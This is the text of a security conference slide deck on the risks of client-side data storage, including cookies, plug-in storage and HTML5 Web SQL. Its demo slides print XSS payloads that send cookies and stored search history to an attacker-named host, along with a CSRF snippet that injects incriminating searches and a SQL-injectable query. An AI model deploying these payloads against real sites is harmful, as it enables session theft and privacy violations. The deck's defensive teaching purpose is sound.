The Risks of Client-Side Data Storage From cookie to database

(1)

The Risks of Client-Side Data Storage

From cookie to database

(2)

Agenda

Client-Side Data Storage (CSDS):

▪ What it is

▪ Why it’s used

▪ How it’s implemented

▪ Demo – SecurSearch Search Engine

▪ What the risks are

(3)

Agenda

▪ What it is

(4)

CSDS – What it is

Storage of information on the PC of a user:

▪ Initiated by a website

▪ Performed by the browser or a browser plug-in

▪ Not necessarily noticed by the user

▪ Stored for an hour

▪ Just some bytes

, a day, a month, or forever … , kilobytes, or megabytes

(5)

Agenda

▪ What it is

(6)

CSDS – Why it’s used ▪ Session fixation

▪ Server fixation (load balancing)

▪ User tracking / profiling

▪ Statistics

▪ Performance

▪ Offline web application support

▪ User configuration / preferences

(7)

Agenda

▪ What it is

(8)

CSDS – How it’s implemented (pre HTML 5) Cookies IE User Data Adobe Flash D Oracle Java Microsoft Silverlight Google Gears U U U 80 KB 640 KB 100 KB ? 1 MB ? SQLite database XML-files Apache Derby DB LocalSharedObjects Small text files

XML-files

Mechanism Default Size Description

Development stopped in 2010, superseded by HTML 5 Web SQL Database

(9)

CSDS – How it’s implemented (cookies)

Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; expires=Sun, 15-Nov-2011 14:50:38 GMT;

path=/; domain=.secblog.nl; HttpOnly

Set-Cookie: SESSIONID=c22as11qr2921aa5:WI=1372122210: PWO=PQ1rpFf0DcYS01S2; expires=Thu, 15-Nov-2011

14:50:38 GMT; path=/; domain=.secblog.nl www .secblog.nl stats .secblog.nl login .secblog.nl rss .secblog.nl redirect .secblog.nl video .secblog.nl search .secblog.nl …

(10)

CSDS – How it’s implemented (Same Origin Policy) http://www.x.nl Origin: • Host : www.x.nl • Protocol : http • Port : 80 (implicit) https://www.x.nl http://www.x.nl:82 http://ww.x.nl

(11)

CSDS – How it’s implemented (JavaScript)

JavaScript is used to manage much of these mechanisms

(12)

CSDS – How it’s implemented (plug-in support)

Gears – 6,2% Silverlight – 52,9% Java – 79,4% Flash – 96,8%

Source: StatOwl Statistics april 2010 – september 2010 (www.statowl.com)

(13)

CSDS – How it’s implemented

(14)

CSDS – How it’s implemented (HTML 5 storage)

Web Storage

Web SQL Database

Indexed Database Use of indexes

Endorsed by Microsoft and Mozilla

Name/value pairs

LocalStorage and SessionStorage

Full client-side DB with query-support based on SQLite

Probably replaced by IndexedDB

(15)

CSDS – How it’s implemented (browser support)

Web Storage

Web SQL Database Indexed Database API

D D D D D U U D D D U U U U U IE UserData D U U U U Microsoft Silverlight D D D D D Google Gears D D U _{D D} Adobe Flash D D D D D Cookies D D D D D HTML5 “Traditional”

(16)

(17)

Agenda

▪ What it is

▪ Demo – SecurSearch Search Engine ▪ What the risks are

(18)

csXSS

<iframe width=0 height=0 src=‘/hack1_script.html’></iframe>

<script>document.location=‘http://www.secursearch.com/index.p l?q=%3C%2Fa%3E%3Ca+href%3D%22%22+onmouseover%3D%22javascript% 3Adocument.location%3D%27http%3A%2F%2Fwww.ihackedsecursearch. com%2Fhack1.pl%3F%27+%2B+document.cookie%3B%22%3Ehaha move your mouse%3C%2Fa%3E’;</script> </a><a href="" onmouseover="javascript:document.location='http://www.ihacked secursearch.com/hack1.pl?' + document.cookie;">haha move your mouse</a>’;

1 2

(19)

csXSS

(20)

XSS

<script>if (window.openDatabase){var

db=openDatabase(“secursearch_db”,”1.0”,”Web SQL

Database”,2097152);db.transaction(function(tx){tx.executeSql( “SELECT * FROM search_terms”,[],function(tx,results){var

stroutput=“”;for(i=0;i<results.row.length;i++){stroutput=stro utput+results.rows.item(i)[“term”]+”***”;}document.getElement ById(“feedback”).innerHTML=“<img width=1 height=1

src=http://www.ihackedsecursearch.com/register.pl?history=“+s troutput+”>”;});});}</script>

(21)

XSS

var db=openDatabase(“secursearch_db”,”1.0”,”Web SQL …

tx.executeSql(“SELECT * FROM search_terms”, [], …

for(i=0; i<results.row.length; i++){ stroutput = stroutput +

results.rows.item(i)[“term”] + ”***”; }

document.getElementById(“feedback”).innerHTML = “<img width=1 height=1

src=http://www.ihackedsecursearch.com/register.pl? history=“ + stroutput + ”>”;

Open database Load search term table

Read contents of table

(22)

CSRF

search[0] = ‘how to hack ministry of internal affairs’; search[1] = ‘blackmailing the minister’;

search[2] = ‘found backdoor in ministry website’;

framehandle.src = ‘http://www.secursearch.com/index.pl?q=‘ + search[0]; framehandle.src = ‘http://www.secursearch.com/index.pl?q=‘ + search[1]; framehandle.src = ‘http://www.secursearch.com/index.pl?q=‘ + search[2];

(23)

Agenda

Client-Side Data Storage:

▪ What it is

▪ Demo

(24)

CSDS – What the risks are (technical issues)

▪ Cross-Site Scripting (XSS)

▪ Client-side XSS (csXSS)

▪ Client-side SQL injection (csSQLi)

▪ Browser vulnerabilities / shortcomings:

−incomplete deletion of data (e.g. plug-in data)

▪ User access to data (integrity issues)

WhiteHat Website Security Statistic Report - Fall 2010 Sep 22, 2010

(25)

CSDS – What the risks are (technical issues)

▪ Same origin policy issues:

− Browser vulnerabilities

− (cs)XSS

− Freedom in domain name

− DNS cache poisoning

− Shared servers

▪ No expiration on client-side data

▪ Use of immature technology

mad-fred.secblog.nl crazy-daisy.secblog.nl maniac-jack.secblog.nl www.secblog.nl/~mad-fred www.secblog.nl/~crazy-daisy www.secblog.nl/~maniac-jack

(26)

CSDS – What the risks are (incomplete deletion)

Web Storage

Web SQL Database Indexed Database API

U _{D D} U D U D D D IE UserData D Microsoft Silverlight U U U U U Google Gears U U U U Adobe Flash U U U U U Cookies D D D D D HTML5 “Traditional”

Plug-in data is never deleted!

LocalStorage: D SessionStorage: U

(27)

CSDS – What the risks are (damage -- user)

▪ Profiling / user tracking (privacy issues)

▪ Data leakage (also privacy issues)

(28)

CSDS – What the risks are (damage -- organization)

▪ Application logic influenced:

− Authentication bypass (e.g. cookie theft)

− Use of corrupted client data by the web application

(29)

CSDS – What the risks are (legal action)

Ars Technica

Jacqui Cheng Aug 16, 2010

(30)

CSDS – What the risks are (legal action)

Wired

Ryan Singel Jul 27, 2010

(31)

Agenda

Client-Side Data Storage:

▪ What it is

▪ Demo

▪ What you should do about it

Geek & Poke

Oliver Widder Sep 20, 2010

(32)

CSDS – What you should do about it (as a user)

Miguel Fernandez

gegen-den-strich.com ▪ Delete your client-side data frequently

▪ Restrict the information you give away

▪ Harden your browser

− Selectively block JavaScript − Block third-party storage − Delete data automatically

− Disable HTML5 storage (for now) − Use white- and blacklists

(33)

CSDS – What you should do about it (as a developer)

▪ Decide if you need local storage anyway

▪ Describe your privacy policy (be open)

▪ Prepare your webapp for ‘no data’ systems

▪ Don’t trust locally stored data

(34)

CSDS – What you should do about it (as a developer) Take XSS vulnerabilities very seriously

(or better, … prevent them!)

Use placeholders for SQL statements (to prevent Client-Side SQL Injection)

Don’t use HTML5 storage mechanisms yet in production (and especially not on shared servers!)

tx.executeSql (“INSERT INTO table (field) VALUES (‘” + strID + “’)”);

(35)

Conclusions

Most of the threats are not new

Server-side threats turn into client-side threats (csXSS, csSQLi)

(36)

Conclusions

▪ Biggest challenges are:

− the growing amount of information on clients

− how about data integrity?

− how about data confidentiality?

− plug-ins that cannot be controlled

▪ As an organization, make a distinction between: − threats to your users

(37)

Thank you for your time!

The Risks of Client-Side Data Storage From cookie to database

Questions?